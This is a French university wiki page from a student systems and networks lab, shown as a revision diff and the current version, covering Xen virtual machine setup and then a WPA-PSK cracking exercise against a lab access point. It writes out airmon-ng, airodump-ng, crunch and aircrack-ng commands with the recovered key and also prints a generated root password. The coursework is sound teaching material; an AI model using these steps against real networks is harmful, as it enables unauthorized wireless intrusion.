TP sysres IMA2a5 2019/2020 G1 : Différence entre versions

De Wiki d'activités IMA
(5 Tests d'intrusion)
(5 Tests d'intrusion)
Ligne 137 : Ligne 137 :
 
Puis on récupère le handshake qui correspond au moment où le kracotte veut entreprendre la communication avec le routeur
 
Puis on récupère le handshake qui correspond au moment où le kracotte veut entreprendre la communication avec le routeur
 
  airodump-ng -w -handshake -c 2 --bssid 04:DA:D2:9C:50:58 wlan0mon
 
  airodump-ng -w -handshake -c 2 --bssid 04:DA:D2:9C:50:58 wlan0mon
 +
 +
Une fois le handshake récupéré, on va créer un dictionnaire contenant les caractères que l'on pense être contenus dans la clé WPA et avec le nombre minimal et maximal de caractères ( 8 et 8, dans notre cas)
 +
On utilise crunch :
 +
crunch 8 8 0123456789 >> Dico_fc.txt
 +
 +
Ensuite on lance la commande qui va comparer le handshake et le dictionnaire :
 +
root@zabeth14:/home/pifou/Desktop/craquage WPA# aircrack-ng handshake-02.cap -w Dico_fc.txt
 +
 +
Puis on laisse tourner jusqu'à ce qu'il trouve la clé. (Bonne soirée...)
 +
Opening handshake-02.cap
 +
Read 242831 packets.
 +
 +
  #  BSSID              ESSID                    Encryption
 +
 +
  1  04:DA:D2:9C:50:58  kracotte01                WPA (1 handshake)
 +
 +
Choosing first network as target.
 +
 +
Opening handshake-02.cap
 +
Reading packets, please wait...
 +
 +
                                Aircrack-ng 1.2 rc4
 +
 +
      [00:21:23] 10222228/102795810 keys tested (8175.38 k/s)
 +
 +
      Time left: 3 hours, 8 minutes, 43 seconds                  9.94%
 +
 +
                          KEY FOUND! [ 10222222 ]
 +
 +
 +
      Master Key    : FB F0 0D 55 85 CC 0D A6 9B AA 68 CE 90 3D D2 84
 +
                      02 AD A6 12 3D 35 8A 2D 67 58 CF 0A 1B 99 30 B0
 +
 +
      Transient Key  : C9 A5 CD E3 86 CC 6E B9 72 FE 47 B6 12 29 75 95
 +
                      70 B3 7E 31 05 0F C0 F5 53 92 7C 97 07 81 9D 90
 +
                      09 F2 0B 66 4C 6D 58 35 5E CC E2 5A 2A 25 D2 66
 +
                      18 36 5D 9D 57 30 A5 72 AA 89 55 1E 27 84 D1 3A
 +
 +
      EAPOL HMAC    : 2A 02 78 56 B1 DC 14 02 D1 27 54 6E 3D 0C 71 7E

Version du 28 novembre 2019 à 10:08

Maxime Hirt - Fabien Cavalier


2 Installation de la machine virtuelle avec xen

ssh root@cordouan.insecserv.deule.net
xen-create-image --hostname=ima2a5-zerofun --dhcp --dir=/usr/local/xen --dist=ascii
--apt-proxy=http://proxy.polytech-lille.fr:3128

Creation fichier de config:

xl create ima2a5-zerofun.cfg

Modification du fichier de configuration de la VM

nano ima2a5-zerofun.cfg
 #
 # Configuration file for the Xen instance ima2a5-zerofun, created
 # by xen-tools 4.7 on Fri Nov  8 08:57:54 2019.
 #
 
 #
 #  Kernel + memory size
 #
 kernel      = '/boot/vmlinuz-4.9.0-6-amd64'
 extra       = 'elevator=noop'
 ramdisk     = '/boot/initrd.img-4.9.0-6-amd64'
 
 vcpus       = '1'
 memory      = '256'
 
 
 #
 #  Disk device(s).
 #
 root        = '/dev/xvda2 ro'
 disk        = [
 'file:/usr/local/xen/domains/ima2a5-zerofun/disk.img,xvda2,w',
 'file:/usr/local/xen/domains/ima2a5-zerofun/swap.img,xvda1,w',
 ]
 
 
 #
 #  Physical volumes
 #
 
 
 #
 #  Hostname
 #
 name        = 'ima2a5-zerofun'
 
 #
 #  Networking
 #
 dhcp        = 'dhcp'
 vif         = [ 'mac=00:16:3E:92:4D:4E, bridge=IMA2a5' ]
 
 #
 #  Behaviour
 #
 on_poweroff = 'destroy'
 on_reboot   = 'restart'
 on_crash    = 'restart'
 
 

Lancement de la VM

xl console ima2a5-zerofun

Récupération du mot de passe

cat /var/log/xen-tools/ima2a5-zerofun.log | grep Password
>>Root Password   :  a7a5eajZ5uCpXrZXWQ9esTT

On peut ensuite modifier le mot de passe avec passwd

Configuration de la machine virtuelle pour que var et home soient des partitions de l'hôte

   lvcreate -L10G -n ima2a5-zerofun-home virtual
   lvcreate -L10G -n ima2a5-zerofun-var virtual
   mke2fs /dev/virtual/ima2a5-zerofun-home
   mke2fs /dev/virtual/ima2a5-zerofun-var


Modification du fichier de config

   disk    	= [
                 	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',
                 	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               
                      'phy:/dev/virtual/ima2a5-zerofun-home,xvdb1,w',
                      'phy:/dev/virtual/ima2a5-zerofun-var,xvdb2,w',
                ]

3 Architecture réseau

network interface...

5 Tests d'intrusion

Le package aircrack-ng était déjà installé, pas besoin de le refaire.

5.2 Cassage de clef WEP d’un point d’accès Wifi

Passage de la carte wifi en mode moniteur

airmon-ng 
>> phy0 wlx40a5ef0f679b rt2800usb Ralink Technology, Corp. RT5370
airmon-ng start wlx40a5ef0f679b

Ecoute des trames Wifi sur le canal 2

airodump-ng -c 2 wlx40a5ef0f679b

Récupération des datas échangées sur le réseau Wifi

airodump-ng


Craquage WPA-PSK D'abord on va lister les interfaces WiFi de notre machine avec la commande

airmon-ng 
PHY	Interface	Driver		Chipset
phy0	wlx40a5ef0590b2	rt2800usb       Ralink Technology, Corp. RT5370 


Ensuite on va lancer le "monitor mode" pour dédier l'interface à Aircrack

airmon-ng start wlx40a5ef0590b2 

Le pc va renommer l'interface par un nom standard qu'il réutilisera pour d'autres commandes. Si on re-check les interfaces, on a maintenant :

PHY	Interface	Driver		Chipset
phy0	wlan0mon	rt2800usb       Ralink Technology, Corp. RT5370 


Ensuite on récupère l'adresse MAC du point d'accès avec :

airodum-ng --encrypt wpa wlan0mon

On prend le BSSID de notre kracotte01 => 04:DA:D2:9C:50:58

Puis on récupère le handshake qui correspond au moment où le kracotte veut entreprendre la communication avec le routeur

airodump-ng -w -handshake -c 2 --bssid 04:DA:D2:9C:50:58 wlan0mon

Une fois le handshake récupéré, on va créer un dictionnaire contenant les caractères que l'on pense être contenus dans la clé WPA et avec le nombre minimal et maximal de caractères ( 8 et 8, dans notre cas) On utilise crunch :

crunch 8 8 0123456789 >> Dico_fc.txt

Ensuite on lance la commande qui va comparer le handshake et le dictionnaire :

root@zabeth14:/home/pifou/Desktop/craquage WPA# aircrack-ng handshake-02.cap -w Dico_fc.txt

Puis on laisse tourner jusqu'à ce qu'il trouve la clé. (Bonne soirée...)

Opening handshake-02.cap
Read 242831 packets.
  #  BSSID              ESSID                     Encryption
  1  04:DA:D2:9C:50:58  kracotte01                WPA (1 handshake)
Choosing first network as target.
Opening handshake-02.cap
Reading packets, please wait...
                                Aircrack-ng 1.2 rc4
     [00:21:23] 10222228/102795810 keys tested (8175.38 k/s) 
     Time left: 3 hours, 8 minutes, 43 seconds                  9.94%
                          KEY FOUND! [ 10222222 ]


     Master Key     : FB F0 0D 55 85 CC 0D A6 9B AA 68 CE 90 3D D2 84 
                      02 AD A6 12 3D 35 8A 2D 67 58 CF 0A 1B 99 30 B0 
     Transient Key  : C9 A5 CD E3 86 CC 6E B9 72 FE 47 B6 12 29 75 95 
                      70 B3 7E 31 05 0F C0 F5 53 92 7C 97 07 81 9D 90 
                      09 F2 0B 66 4C 6D 58 35 5E CC E2 5A 2A 25 D2 66 
                      18 36 5D 9D 57 30 A5 72 AA 89 55 1E 27 84 D1 3A 
     EAPOL HMAC     : 2A 02 78 56 B1 DC 14 02 D1 27 54 6E 3D 0C 71 7E